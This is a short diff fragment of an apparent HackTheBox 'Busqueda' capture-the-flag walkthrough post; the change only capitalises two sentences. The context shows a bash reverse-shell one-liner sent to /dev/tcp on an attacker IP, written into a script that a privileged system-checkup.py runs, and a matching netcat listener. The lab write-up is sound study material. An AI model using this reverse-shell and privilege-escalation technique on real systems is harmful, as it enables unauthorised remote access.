will-analyze/will-analyze.github.io/_posts/2024-11-09-HackTheBox_Busqueda_Walkthrough.md

 bash -c 'bash -i >& /dev/tcp/10.10.14.186/8080 0>&1'
 ```

-from here, we will create a new full-checkup.sh in the tmp directory and run the system-checkup.py and receive the shell on our machine:
+From here, we will create a new full-checkup.sh in the tmp directory and run the system-checkup.py and receive the shell on our machine:

-also make sure that you have a netcat session setup on the port of your choice:
+Also make sure that you have a netcat session setup on the port of your choice:

 ``` bash
 nc -nlvp 8080 -s 10.10.14.186